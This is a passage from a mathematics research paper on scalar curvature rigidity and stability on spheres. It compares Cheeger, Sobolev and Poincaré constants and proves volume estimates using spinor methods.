exists a set \(\Omega\) with \(|\Omega|_{g_{0}}\leq\varepsilon\) such that \(g_{i}\to g_{0}\) on \(S^{n}\setminus\Omega\) in the \(C^{0}\) sense after passing to a subsequence._ It is necessary to pass to a subsequence in Theorem C and there are counterexamples otherwise, cf. Remark 4.3. We expect that spinors will also be useful to answer other stability questions. **Acknowledgements:** Part of this work was carried out while the authors attended a conference at the Simons Center for Geometry and Physics and the authors are grateful for the stimulating research environment. SH was supported by the National Science Foundation under Grant No. DMS-1926686, and by the IAS School of Mathematics. The authors also want to thank Brian Allen, Edward Bryden, Demetre Kazaras, Richard Schoen and Christina Sormani for insightful discussions and their interest in this work. Figure 1. A sequence of manifolds \((S^{n},g_{i})\) with uniformly bounded Poincaré constants, cf. Proposition 2.7. ## 2. Cheeger, Sobolev, and Poincare constants In this section, we recall the definitions of Cheeger, Sobolev, and Poincare constants and discuss their interrelationships. Throughout this section, \((M^{n},g)\) is a smooth compact Riemannian manifold without boundary. ### Definitions and preliminaries **Definition 2.1**.: _The Poincare constant of \((M^{n},g)\) is defined by_ \[C_{P}=\sup_{u\in W^{1,2}(M)}\frac{\inf_{a\in\mathbb{R}}\|u-a\|_{2}^{2}}{\| \nabla u\|_{2}^{2}}. \tag{1}\] We remark that \(C_{P}^{-1}\) is the first eigenvalue of the Laplace operator on \(M^{n}\). Before we define the Sobolev constants \(C_{S_{\alpha}}\), we first introduce two other, more commonly used geometric constants, see for instance [12, Definition 2.4] by X. Dai, G. Wei and Z. Zhang, and [10] by P. Li. **Definition 2.2**.: _For \(\alpha\in[n,\infty]\), the Neumann \(\alpha\)-isoperimetric constant \(\mathrm{IN}_{\alpha}\) of \(M\) is defined by_ \[\mathrm{IN}_{\alpha}(M)=\sup_{\Sigma}\frac{\min\{|\Omega_{1}|,|\Omega_{2}|\}^ {1-\frac{1}{\alpha}}}{|\Sigma|}, \tag{2}\] _where \(\Sigma\) is any smooth surface dividing \(M\) into the regions \(\Omega_{1}\) and \(\Omega_{2}\). The Neumann \(\alpha-\)Sobolev constant of \(M\) is defined by_ \[\mathrm{SN}_{\alpha}=\sup_{f\in W^{1,1}(M)}\frac{\inf_{a\in\mathbb{R}}\|f-a\|_ {\frac{\alpha}{\alpha-1}}}{\|\nabla f\|_{1}}. \tag{3}\] The Neumann \(\infty\)-isoperimetric \(\mathrm{IN}_{\infty}\) is usually referred to as the Cheeger constant. We remark that some authors refer to \(\mathrm{IN}_{\infty}^{-1}\) as the Cheeger constant instead. Next, we recall from [10, Theorem 9.2]. **Proposition 2.3**.: _For all \(n\leq\alpha\leq\infty\), we have_ \[\frac{1}{2}\,\mathrm{IN}_{\alpha}(M)\leq\mathrm{SN}_{\alpha}(M)\leq\mathrm{IN} _{\alpha}(M). \tag{4}\] **Definition 2.4**.: _For \(\alpha\in[n,\infty]\), the Sobolev constant \(C_{S_{\alpha}}\) and the normalized Sobolev constant \(C_{S_{\alpha}}^{*}\) are defined by_ \[C_{S_{\alpha}}=\sup_{f\in W^{1,2}}\frac{\inf_{a\in\mathbb{R}}\|f-a\|_{\frac{ \alpha_{2}}{\alpha-2}}}{\|\nabla f\|_{2}}\quad\text{and}\quad C_{S_{\alpha}}^ {*}=C_{S_{\alpha}}|M|^{\frac{1}{\alpha}}. \tag{5}\] In Section 2.2, we will delve deeper into the case \(\alpha=\infty\) and compare the Cheeger constant to the Poincare constant. We will observe that a bound on the former implies a bound on the latter. Similarly, a bound on \(\mathrm{SN}_{\alpha}\) implies a bound on \(C_{S_{\alpha}}\). For the reader's convenience, we sketch the following proof of R. Schoen [25]. **Proposition 2.5**.: _Let \(p\in[1,\alpha)\). For any \(f\in C^{\infty}(M)\), we have_ \[\inf_{a\in\mathbb{R}}\|f-a\|_{\frac{p^{\alpha}}{\alpha-p}}\leq\frac{p(\alpha- 1)}{\alpha-p}\,\mathrm{IN}_{\alpha}\,\|\nabla f\|_{p}. \tag{6}\] Proof.: Let \(\bar{f}\) be the constant such that \(\{f\geq\bar{f}\}\geq\frac{1}{2}|M|\) and \(\{f\leq\bar{f}\}\geq\frac{1}{2}|M|\). Then we have \[\mathrm{IN}_{\alpha}(M)=\inf_{f\in C^{\infty}(M)}\frac{\|f-\bar{f}\|_{\frac{ \alpha}{\alpha-1}}}{\|\nabla f\|_{1}}. \tag{7}\] Let \(v=(f-\bar{f})_{+}\) and observe that \(\{v\geq 0\}\geq\frac{1}{2}|M|\) and \(\{v\leq 0\}\geq\frac{1}{2}|M|\). Hence, we may apply (7) with \(\bar{v}=0\). Combining this with Holder's inequality yields \[\left(\int_{M}v^{\frac{s\alpha}{\alpha-1}}dV\right)^{\frac{s-1}{\alpha}}\leq s \operatorname{IN}_{\alpha}\int_{M}v^{s-1}|\nabla v|dV\leq s\operatorname{IN}_ {\alpha}\left(\int_{M}v^{(s-1)\frac{n}{p-1}}dV\right)^{\frac{p-1}{p}}\|\nabla v \|_{p} \tag{8}\] where we set \(s=\frac{p(\alpha-1)}{\alpha-p}\) which ensures \(\frac{s\alpha}{\alpha-1}=\frac{p(s-1)}{p-1}\). Similarly, we obtain \[\left(\int_{M}(f-\bar{f})_{-}^{\frac{s\alpha}{\alpha-1}}dV\right)^{\frac{\alpha -1}{\alpha}}\leq s\operatorname{IN}_{\alpha}\left(\int_{M}(f-\bar{f})_{-})^{( s-1)\frac{p}{p-1}}dV\right)^{\frac{p-1}{p}}\|\nabla(f-\bar{f})_{-}\|_{p}. \tag{9}\] Adding the above two inequalities gives \[\left(\int_{M}|f-\bar{f}|^{\frac{s\alpha}{\alpha-p}}dV\right)^{\frac{1}{p}- \frac{1}{\alpha}}\leq\frac{p(\alpha-1)}{\alpha-p}\operatorname{IN}_{\alpha} \|\nabla f\|_{p} \tag{10}\] which finishes the proof. **Remark 2.6**.: _Since \(g_{i}\geq g_{0}\) implies a lower volume bound, Theorem B still holds with an upper bound on \(C_{S_{\alpha}}\) instead of \(C_{S_{\alpha}}^{*}\). Moreover, according to the above proposition, Theorem B also holds with an upper bound on \(\operatorname{SN}_{\alpha}\) and \(\operatorname{IN}_{\alpha}\)._ ### Comparison between the Cheeger and the Poincare constant As mentioned above, a uniform upper bound on the Cheeger constants implies a uniform upper bound on the Poincare constants. This is known as Cheeger's inequality [11]. According to Buser's inequality [8], the reverse inequality also holds as long as a uniform lower Ricci curvature bound is imposed. This condition is necessary as demonstrated in [7, Section 4] by P. Buser where the conformal invariance of the Dirichlet integral in dimension \(2\) is exploited. In the proposition below, we adapt this example to higher dimensions. In particular, a Poincare constant upper bound does not prevent the presence of bags of gold, cf. Figure 1. **Proposition 2.7**.: _There exists a family of metrics \(g_{\delta}\) on \(S^{n}\) such that the Poincare constants of \(g_{\delta}\) are uniformly bounded from above while the Cheeger constants diverge to \(\infty\)._ Proof.: Let \(g_{0}\) be the round metric, fix an equator \(S^{n-1}\subset S^{n}\), and let \(\rho\) be the signed distance function (w.r.t. \(g_{0}\)) to this equator. For each \(\delta\in(0,\frac{1}{2}]\), we define \(g_{\delta}=ug_{0}\) where \(u=u_{\delta}(\rho)\) is a function depending only on \(\rho\). More precisely, we prescribe that * \(u(\rho)=u(-\rho)\), * \(u(\rho)=1\) for \(\rho\in[\delta,\frac{\pi}{2}]\), * \(u\) attains its minimum at \(\rho=0\) with \(u(0)=\delta^{\frac{1}{n-1}}\), * \(u\leq 1\) for all \(\rho\in[-\frac{\pi}{2},\frac{\pi}{2}]\). It is easy to see that the Cheeger constants of \((S^{n},g_{\delta})\) diverge to \(\infty\) for \(\delta\to 0\) in view of Definition (2). To see that the Poincare constants stay bounded for \(\delta\to 0\), we proceed as follows. Let \(\psi\) be the first eigenfunction of the Laplacian and recall that it realizes the Poincare constant, i.e. \(C_{P}=\frac{\int_{S^{n}}\psi^{2}dV_{g}}{\int_{S^{n}}|\nabla\psi|^{2}dV_{g}}\). Here we omit any \(\delta\) subscripts to declutter the notation. First, observe that \(\psi\) inherits the symmetries of \(u\), i.e. \(\psi\) depends only on \(\rho\), and \(\psi(\rho)=\psi(-\rho)\). Moreover, we may scale \(\psi\) such that \(\psi(\pm\frac{\pi}{2})=\pm 1\). Next, we claim that \(\psi\) is monotonically increasing in \(\rho\) which in particular implies that \(|\psi|\leq 1\). Suppose \(\psi\) is not monotone. Then there exist various local minima and maxima which will be attained at \(-a_{k},-a_{k-1},\ldots,-a_{1},a_{1},\ldots,a_{k-1},a_{k}\). We denote with \(b_{k}\) the function values \(b_{k}=\psi(a_{k})\). Note that \(b_{k}=-b_{-k}\). Let \(b_{l}\) be the maximal value of \(\{b_{1},\ldots,b_{k}\}\). We distinguish two cases. First suppose that \(b_{l}\geq 1\). In this case, consider the function \(\overline{\psi}\) defined by \(\overline{\psi}(x)=b_{k}\) for \(x\geq a_{k}\), and \(\overline{\psi}(x)=\psi(x)\) for \(x<a_{k}\). Then \(\int_{S^{n}}\overline{\psi}^{2}dV_{g}>\int_{S^{n}}\psi^{2}dV_{g}\) and \(\int_{S^{n}}|\nabla\overline{\psi}|^{2}dV_{g}<\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\). This is a contradiction to the assumption that \(\psi\) realizes the Poincare constant. Suppose now that that \(b_{l}<1\). In this case, we can find a point \(c\in(a_{l},1)\) such that \(\psi(c)=b_{l}\) and \(\psi(x)<b_{l}\) for \(x\in(a_{l},c)\) Now we proceed as above by setting \(\overline{\psi}(x)=b_{l}\) for \(x\in[a_{l},c]\) which again leads to contradiction. Hence, \(\psi\) is monotone and we have \(|\psi|\leq 1\). To estimate the Poincare constants of \((S^{n},g_{\delta})\) we need to make another case decomposition. First, suppose that \(\psi(\delta)\leq\frac{1}{2}\). To show that the Poincare constant is uniformly bounded (in \(\delta\)), we need to estimate \(\int_{S^{n}}\psi^{2}dV_{g}\) from above and \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\) from below. Clearly, \(\int_{S^{n}}\psi^{2}dV_{g}\leq|S^{n}|_{g_{0}}\) since \(|\psi|\leq 1\). Define \(\overline{\psi}\) by setting \(\psi(\rho)=0\) for \(\rho\in[-\delta,\delta]\), and \(\overline{\psi}(\rho)=a\psi(\rho)-b\) otherwise. Here, the constants \(a\in[1,2]\) and \(b\in[0,1]\) are chosen such that \(\overline{\psi}\) is Lipschitz and \(\overline{\psi}(\pm 1)=\pm 1\). Then \(\overline{\psi}\) is a valid competitor for computing the Poincare constant for \((S^{n},g_{0})\). Moreover, \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\geq\frac{1}{4}\int_{S^{n}}|\nabla\overline{ \psi}|^{2}dV_{g_{0}}\). Thus, we have obtained a uniform bound for \(C_{P}\) in this case. Next, suppose that \(\psi(\delta)>\frac{1}{2}\). Again, we obtain the bound \(\int_{S^{n}}\psi^{2}dV_{g}\leq|S^{n}|_{g_{0}}\) and it remains to estimate \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\). We compute \[\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\geq\int_{-\delta\leq\rho\leq\delta}|\nabla \psi|^{2}dV_{g}\geq\int_{-\delta}^{\delta}|S^{n-1}|_{g_{0}}\left(\sqrt{1- \delta^{2}}u(0)\right)^{n-1}|\nabla\psi|^{2}d\rho\geq C(n)\delta\int_{-\delta} ^{\delta}|\nabla\psi|^{2}d\rho \tag{11}\] where \(C(n)\) is a constant depending only on \(n\). Since \(u\leq 1\), we have \(|\nabla\psi|^{2}\geq(\partial_{\rho}\psi)^{2}\). Hence, \[\int_{-\delta}^{\delta}|\nabla\psi|^{2}d\rho\geq\int_{-\delta}^{\delta}( \partial_{\rho}\psi)^{2}d\rho\geq\frac{1}{2\delta}\left(\int_{-\delta}^{\delta }\partial_{\rho}\psi d\rho\right)^{2}>\frac{1}{2\delta}, \tag{12}\] and the result follows. We remark that \((S^{n},g_{\delta})\) does not converge to \((S^{n},g_{0})\) in the intrinsic flat convergence, cf. [3, Example 2.5]. We also note that \(g_{\delta}\geq g_{0}\) does not hold, and the above example is therefore not a counter example to Theorem A. A similar example can be constructed where the Neumann \(\alpha\)-Sobolev constants \(\mathrm{SN}_{\alpha}\) go to infinity, but the Sobolev constants \(C_{S_{\alpha}}\) remain bounded. The key is to make the cylinder connecting the two hemispheres very short so the gradient of \(\psi\) cannot accumulate in this region. ## 3. Proof of Theorem A **Lemma 3.1**.: _Let \(n\geq 3\), let \(g\) be a smooth complete metric on \(S^{n}\) and let \(\varepsilon\leq\min\{C_{P}^{-1},\frac{1}{100}\}\). Suppose that \(g\geq g_{0}\) on two-forms, and \(R_{g}\geq n(n-1)-\varepsilon\). Then there exists a constant \(C_{n}\) depending only on \(n\) such that_ \[|S^{n}|_{g}-|S^{n}|_{g_{0}}\leq C_{n}\sqrt{\varepsilon}. \tag{13}\] Proof in even dimensions.: Let \(\{e_{1},...,e_{n}\}\) be an orthonormal frame on \((S^{n},g_{0})\), which forms an orthogonal frame with respect to \(g\). We define \(\lambda_{j}=|e_{j}|_{g}\). According to Llarull's paper [24], we have \[\int_{S^{n}}|\phi|^{2}\left[\sum_{j\neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{ g}\right]dV_{g}\geq 4\int_{S^{n}}|\nabla\phi|^{2}dV_{g}, \tag{14}\] where \(\phi\) is the harmonic spinor on the twisted spin bundle defined in [24]. Note that by assumption \(\lambda_{j}\lambda_{l}\geq 1\) for all \(j\neq l\). Without loss of generality, we may rescale \(\phi\) such that \(\int_{S^{n}}|\phi|dV_{g}=|S^{n}|_{g}\). Using the Poincare inequality and Kato's inequality, we obtain \[4C_{P}\int_{S^{n}}|\nabla\phi|^{2}dV_{g}\geq 4\int_{S^{n}}(|\phi|-1)^{2}dV_{g}. \tag{15}\] Combining this with our assumptions and equation (14) yields \[\varepsilon\int_{S^{n}}|\phi|^{2}dV_{g}\geq 4C_{P}^{-1}\int_{S^{n}}(|\phi|-1)^{2} dV_{g}. \tag{16}\] Using \[\int_{S^{n}}|\phi|^{2}dV_{g}=|S^{n}|_{g}+\int_{S^{n}}(|\phi|-1)^{2}dV_{g}, \tag{17}\] we obtain \[\varepsilon|S^{n}|_{g}\geq(4C_{P}^{-1}-\varepsilon)\int_{S^{n}}(|\phi|-1)^{2}dV_ {g} \tag{18}\] and \[\int_{S^{n}}|\phi|^{2}dV_{g}\leq\frac{4}{4-C_{P}\varepsilon}|S^{n}|_{g}. \tag{19}\] Next, let \(\mathcal{A}\) be the subset of \((S^{n},g)\) such that \(\max_{l\neq j}\{\lambda_{l}\lambda_{j}\}\geq 1+\sqrt{\varepsilon}\) and suppose that \(\lambda_{1}\leq\cdots\leq\lambda_{n}\). Since \(g\geq g_{0}\) on two-forms, we have \(\lambda_{l}\lambda_{j}\geq 1\) for all \(l\neq j\) which implies \[\sum_{j\neq l}\frac{1}{\lambda_{j}\lambda_{l}}\leq n(n-1)-2+\frac{2}{\lambda_ {n-1}\lambda_{n}}. \tag{20}\] Therefore, we obtain on \(\mathcal{A}\) \[\sum_{j\neq l}\frac{1}{\lambda_{l}\lambda_{j}}-R_{g}\leq\frac{2}{\lambda_{n- 1}\lambda_{n}}-2+\varepsilon\leq 2(1+\sqrt{\varepsilon})^{-1}-2+\varepsilon=-2 \sqrt{\varepsilon}(1+\sqrt{\varepsilon})^{-1}+\varepsilon\leq-\varepsilon^{ \frac{1}{2}}. \tag{21}\] Consequently, \[\begin{split} 0\leq&\int_{S^{n}}|\phi|^{2}\left[\sum_{j \neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{g}\right]dV_{g}\\ \leq&\int_{\mathcal{A}^{c}}\varepsilon|\phi|^{2}dV_{g }-\int_{\mathcal{A}}\sqrt{\varepsilon}|\phi|^{2}dV_{g}\\ =&\varepsilon\int_{S^{n}}|\phi|^{2}dV_{g}-( \varepsilon+\sqrt{\varepsilon})\int_{\mathcal{A}}|\phi|^{2}dV_{g}.\end{split} \tag{22}\] Next, we use (18) to estimate \[\begin{split}\int_{\mathcal{A}}|\phi|^{2}dV_{g}&\geq \int_{\mathcal{A}}2(|\phi|-1)+1dV_{g}\\ &\geq-2|\mathcal{A}|_{g}^{\frac{1}{2}}\left[\int_{\mathcal{A}}(| \phi|-1)^{2}dV_{g}\right]^{\frac{1}{2}}+|\mathcal{A}|_{g}\\ &\geq-2\left(\frac{\varepsilon}{4C_{P}^{-1}-\varepsilon}\right)^ {\frac{1}{2}}|S^{n}|_{g}^{\frac{1}{2}}|\mathcal{A}|_{g}^{\frac{1}{2}}+| \mathcal{A}|_{g}\\ &\geq\frac{1}{2}|\mathcal{A}|_{g}-2\sqrt{\varepsilon}|S^{n}|_{g}. \end{split} \tag{23}\] Combining this inequality with (19) and (22) yields \[0\leq\frac{4\varepsilon}{4-\varepsilon C_{P}}|S^{n}|_{g}-(\varepsilon+\sqrt{ \varepsilon})\left[\frac{1}{2}|\mathcal{A}|_{g}-2\sqrt{\varepsilon}|S^{n}|_{g}\right] \tag{24}\] which implies \[|\mathcal{A}|_{g}\leq 8\sqrt{\varepsilon}|S^{n}|_{g}. \tag{25}\] Note that \[|\mathcal{A}^{c}|_{g}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|\mathcal{A}^{c} |_{g_{0}}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}}. \tag{26}\] Therefore, \[|S^{n}|_{g}\leq(1-8\sqrt{\varepsilon})^{-1}|\mathcal{A}^{c}|_{g}\leq(1-8\sqrt {\varepsilon})^{-1}(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}} \tag{27}\] which finishes the proof. ### Odd dimensional case So far we have showed Lemma 3.1 in even dimensions. We now describe the required adjustments to also obtain the odd dimensional case. This closely follows Llarull's original ideas [24]. Let \(n\geq 3\) be an odd integer. Consider the product metric \(\overline{g}=ds^{2}+g\) on \(S^{n}\times S^{1}_{r}\), where \(S^{1}_{r}\) is a circle of radius \(r\). We note that \(R_{g}=R_{\overline{g}}\) and \[S^{n}\times S^{1}_{r}\xrightarrow{\operatorname{Id}\times\frac{1}{r} \operatorname{Id}}S^{n}\times S^{1}\xrightarrow{h}S^{n}\wedge S^{1}\cong S^{n +1}, \tag{28}\] where \(\wedge\) is the smash product and \(h\) is a \(1\)-contracting map. Applying the spinorial integral formula (14) to the even dimensional manifold \((S^{n}\times S^{1}_{r},\overline{g})\) and using Kato's inequality, we obtain \[\int_{S^{n}\times S^{1}_{r}}\left[2\sum_{1\leq l<j\leq n}\frac{1}{\lambda_{l }\lambda_{j}}+\frac{2}{r}\sum_{l=1}^{n}\frac{1}{\lambda_{l}}-R_{g}\right]| \phi|_{\overline{g}}^{2}dV_{\overline{g}}\geq\int_{S^{n}\times S^{1}_{r}}4| \nabla\phi|_{\overline{g}}^{2}dV_{\overline{g}}. \tag{29}\] For any \(\delta>0\), by choosing \(r\) sufficiently large, there exists a point \(p\) on \(S^{1}_{r}\) such that \[\int_{S^{n}\times\{p\}}\left[2\sum_{1\leq l<j\leq n}\frac{1}{\lambda_{l} \lambda_{j}}-R_{g}-\delta\right]|\phi|_{\overline{g}}^{2}dV_{g}\geq\int_{S^{n }\times\{p\}}4|\nabla|\phi|_{\overline{g}}^{2}dV_{g}. \tag{30}\] Hence, we may continue as before and deduce that Lemma 3.1 also holds in odd dimensions. Proof of Theorem A.: We follow the argument of B. Allen, E. Bryden and D. Kazaras [2]. In view of [3, Theorem 1.1] by B. Allen, R. Perales and C. Sormani, it suffices to show volume convergence. By assumption, \(g_{i}\geq g_{0}\) which implies \(|S^{n}|_{g_{i}}\geq|S^{n}|_{g_{0}}\). Hence, \(|S^{n}|_{g_{i}}\to|S^{n}|_{g_{0}}\) by Lemma 3.1 which finishes the proof. ## 4. Proofs of Theorem B and Theorem C In this section we show Theorem B and Theorem C in even dimensions. For the odd dimensional case we refer to Section 3.1, or more precisely to equation (30). In the previous section we demonstrated how Lemma 3.1 together with [3, Theorem 1.1] implies Theorem A. Similarly, Theorem B will follow from the lemma below. **Lemma 4.1**.: _Let \(n\geq 4\) be an even integer, let \(\alpha\in[n,\infty]\), and let \(g\) be a smooth metric on \(S^{n}\). Suppose that \(\|(R_{g}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\varepsilon|S^{n}|^{ \frac{2}{\beta}}\) for \(0<\varepsilon\leq\min\{\frac{1}{100},(C^{*}_{S_{\alpha}})^{-2}\}\), and that \(g\geq g_{0}\) on two-forms. Then there exists a constant \(C\) depending only on \(n\), \(\alpha\) and \(C^{*}_{S_{\alpha}}\) such that_ \[|S^{n}|_{g}-|S^{n}|_{g_{0}}\leq C\varepsilon^{\frac{1}{\delta}}. \tag{31}\] Proof.: Throughout this proof, we denote with \(C_{i\alpha}\) constants depending only on \(\alpha\) and \(C^{*}_{S_{\alpha}}\). Using Holder's inequality and our assumption on \(R_{g}\), we obtain \[\int_{S^{n}}|\phi|^{2}(n(n-1)-R_{g})_{+}dV_{g}\leq\|\phi\|_{\frac{2\alpha}{ \alpha-2}}^{2}\|(n(n-1)-R_{g})_{+}\|_{\frac{\alpha}{2}}\leq\varepsilon\|\phi \|_{\frac{2\alpha}{\alpha-2}}^{2}|S^{n}|_{\overline{g}}^{\frac{2}{\beta}}. \tag{32}\] Next, we apply the Sobolev inequality (5) to find \[\int_{S^{n}}|\nabla|\phi||^{2}dV_{g}\geq(C^{*}_{S_{\alpha}})^{-2}|S^{n}|_{ \overline{g}}^{\frac{2}{\beta}}\cdot\||\phi|-1\|_{\frac{2\alpha}{\alpha-2}}^{2}. \tag{33}\] Note that we can choose \(a=1\) in the Sobolev inequality (5) by rescaling \(\phi\) appropriately. Combining equation (32), Llarull's integral formula (14), and Kato's inequality yields \[\varepsilon\|\phi\|_{\frac{2\alpha}{\alpha-2}}^{2}|S^{n}|_{\overline{g}}^{ \frac{2}{\beta}}\geq 4\int_{S^{n}}|\nabla\phi|^{2}dV_{g}\geq 4(C^{*}_{S_{\alpha}})^{-2}|S^{n}|_{ \overline{g}}^{\frac{2}{\beta}}\cdot\||\phi|-1\|_{\frac{2\alpha}{\alpha-2}}^{2}. \tag{34}\] This implies \[\varepsilon\left(\int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}\right)^{ \frac{\alpha-2}{\alpha}}\geq 4(C_{S_{\alpha}}^{*})^{-2}\||\phi|-1\|_{\frac{2 \alpha}{\alpha-2}}^{2}. \tag{35}\] Therefore, \[\varepsilon^{\frac{\alpha}{\alpha-2}}\int_{S^{n}}|\phi|^{\frac{2\alpha}{ \alpha-2}}dV_{g}\geq\left(\frac{2}{C_{S_{\alpha}}^{*}}\right)^{\frac{2\alpha} {\alpha-2}}\int_{S^{n}}||\phi|-1|^{\frac{2\alpha}{\alpha-2}}\,dV_{g}. \tag{36}\] By the generalized mean inequality \[|\phi|^{\frac{2\alpha}{\alpha-2}}=(f+1)^{\frac{2\alpha}{\alpha-2}}\leq 2^{ \frac{\alpha+2}{\alpha-2}}(|f|^{\frac{2\alpha}{\alpha-2}}+1) \tag{37}\] where \(f=|\phi|-1\). Thus, \[\int_{S^{n}}|f|^{\frac{2\alpha}{\alpha-2}}dV_{g}\leq C_{0\alpha}\varepsilon^ {\frac{\alpha}{\alpha-2}}|S^{n}|_{g} \tag{38}\] for some constant \(C_{0\alpha}\). Moreover, \[\begin{split}\int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}=& \int_{S^{n}}|f+1|^{\frac{2\alpha}{\alpha-2}}dV_{g}\\ \leq&\int_{S^{n}}2^{\frac{\alpha+2}{\alpha-2}}(|f|^ {\frac{2\alpha}{\alpha-2}}+1)dV_{g}\\ \leq& 2^{\frac{\alpha+2}{\alpha-2}}(1+C_{0\alpha} \varepsilon^{\frac{\alpha}{\alpha-2}})|S^{n}|_{g}.\end{split} \tag{39}\] Therefore, using Holder's inequality, there exist constants \(C_{1\alpha}\), \(C_{2\alpha}\) such that \[\int_{S^{n}}|\phi|^{2}dV_{g}\leq C_{1\alpha}|S^{n}|_{g}\quad\text{and}\quad \int_{S^{n}}|\phi|^{\frac{2\alpha}{\alpha-2}}dV_{g}\leq C_{2\alpha}|S^{n}|_{g}. \tag{40}\] Let us denote with \(\mathcal{B}\) the set \(\mathcal{B}=\{x|n(n-1)-R_{g}\geq\varepsilon^{\frac{2}{3}}\}\). We estimate \[\varepsilon\geq\left[\frac{1}{|S^{n}|_{g}}\int_{S^{n}}[n(n-1)-R_{g}]_{\frac{ \alpha}{2}}^{\frac{\alpha}{2}}dV_{g}\right]^{\frac{2\alpha}{\alpha}}\geq \varepsilon^{\frac{2}{3}}\left(\frac{|\mathcal{B}|_{g}}{|S^{n}|_{g}}\right)^ {\frac{2}{\alpha}} \tag{41}\] which implies \[|\mathcal{B}|_{g}\leq\varepsilon^{\frac{\alpha}{6}}|S^{n}|_{g}. \tag{42}\] As before, let \(\mathcal{A}\) be the subset of \((S^{n},g)\) where \(\max_{l\neq j}\{\lambda_{l}\lambda_{j}\}\geq 1+\sqrt{\varepsilon}\). Then, similar to Equation (21), we obtain \[\sum_{j\neq l}\frac{1}{\lambda_{l}\lambda_{j}}-R_{g}\leq-\varepsilon^{\frac{ 1}{2}}\quad\text{on }\mathcal{A}\cap\mathcal{B}^{c}. \tag{43}\] Hence, \[\begin{split} 0\leq&\int_{S^{n}}|\phi|^{2}\left[\sum_{j \neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{g}\right]dV_{g}\\ \leq&\int_{\mathcal{A}^{c}\cap\mathcal{B}^{c}}| \phi|^{2}\varepsilon^{\frac{2}{3}}dV_{g}-\int_{\mathcal{A}\cap\mathcal{B}^{c} }|\phi|^{2}\varepsilon^{\frac{1}{2}}dV_{g}+\int_{\mathcal{B}}|\phi|^{2}(n(n-1 )-R_{g})dV_{g}\\ \leq&\int_{\mathcal{A}^{c}\cap\mathcal{B}^{c}}| \phi|^{2}\varepsilon^{\frac{2}{3}}dV_{g}-\int_{\mathcal{A}\cap\mathcal{B}^{c} }|\phi|^{2}\varepsilon^{\frac{1}{2}}dV_{g}+\left(\int_{\mathcal{B}}|\phi|^{ \frac{2\alpha}{\alpha-2}}dV_{g}\right)^{\frac{\alpha-2}{\alpha}}\|(n(n-1)-R_ {g})_{+}\|_{\frac{\alpha}{2}}\\ \leq&\varepsilon^{\frac{2}{3}}C_{1\alpha}|S^{n}|_{g} -\varepsilon^{\frac{1}{2}}\int_{\mathcal{A}\cap\mathcal{B}^{c}}|\phi|^{2}dV_{g }+\varepsilon C_{2\alpha}^{\frac{\alpha-2}{\alpha}}|S^{n}|_{g}.\end{split} \tag{44}\] Using Equation (38), we estimate \[\begin{split}\int_{\mathcal{A}\cap\mathcal{B}^{c}}|\phi|^{2}dV_{g}=& \int_{\mathcal{A}\cap\mathcal{B}^{c}}(1+f)^{2}dV_{g}\\ \geq&\int_{\mathcal{A}\cap\mathcal{B}^{c}}\left( \frac{3}{4}-3|f|^{2}\right)dV_{g}\\ \geq&\frac{3}{4}|\mathcal{A}\cap\mathcal{B}^{c}|-3 \left(\int_{\mathcal{A}\cap\mathcal{B}^{c}}1dV_{g}\right)^{\frac{2}{\alpha}} \left(\int_{\mathcal{A}\cap\mathcal{B}^{c}}|f|^{\frac{2\alpha}{\alpha-2}}dV_{g }\right)^{\frac{\alpha-2}{\alpha}}\\ \geq&\frac{3}{4}|\mathcal{A}\cap\mathcal{B}^{c}|_{g} -3|\mathcal{A}\cap\mathcal{B}^{c}|^{\frac{2}{\beta}}_{g}\left(C_{0\alpha} \varepsilon^{\frac{n}{\alpha-2}}|S^{n}|_{g}\right)^{\frac{\alpha-2}{\alpha}}\\ \geq&\frac{1}{2}|\mathcal{A}\cap\mathcal{B}^{c}|_{g} -C_{3\alpha}\varepsilon^{\frac{n}{\alpha-2}}|S^{n}|_{g}.\end{split} \tag{45}\] Combining Equation (44) and (45), there is a constant \(C_{4\alpha}\) such that \[|\mathcal{A}\cap\mathcal{B}^{c}|\leq\varepsilon^{\frac{1}{6}}C_{4\alpha}|S^{n }|_{g}. \tag{46}\] With the help of (42), we obtain \[|\mathcal{A}^{c}|_{g}\geq|\mathcal{A}^{c}\cap\mathcal{B}^{c}|_{g}=|S^{n}|_{g} -|\mathcal{B}|_{g}-|\mathcal{A}\cap\mathcal{B}^{c}|\geq(1-\varepsilon^{\frac{ 1}{6}}C_{4\alpha}-\varepsilon^{\frac{\alpha}{6}})|S^{n}|_{g}. \tag{47}\] Moreover, as in Equation (26) we have \(|\mathcal{A}^{c}|_{g}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}}\). Hence, \[|S^{n}|_{g}\leq(1-\varepsilon^{\frac{1}{6}}C_{4\alpha}-\varepsilon^{\frac{n}{ 6}})^{-1}(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}} \tag{48}\] which finishes the proof. Theorem C will be implied by the proposition below: **Proposition 4.2**.: _Let \(\alpha\in[n,\infty]\), and \(g_{i}\) be a sequence of smooth, metrics on \(S^{n}\), \(n\geq 3\), such that_ 1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{i}|S^{n}| _{g_{i}}^{\frac{2}{\alpha}}\)_,_ 2. \(g_{i}\geq g_{0}\) _on two-forms,_ 3. _the normalized Sobolev constants_ \(C_{S_{\alpha}}^{*}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above._ _Then there exists a constant \(C\) depending only on \(n,\alpha\) and the upper bounds for the Sobolev constants \(C_{S_{\alpha}}\) such that for each \(i\), there exists a set \(\Omega_{i}\) with_ 1. \(|\Omega_{i}|_{g_{i}}\leq Ci^{-\frac{1}{6}}\)_,_ 2. 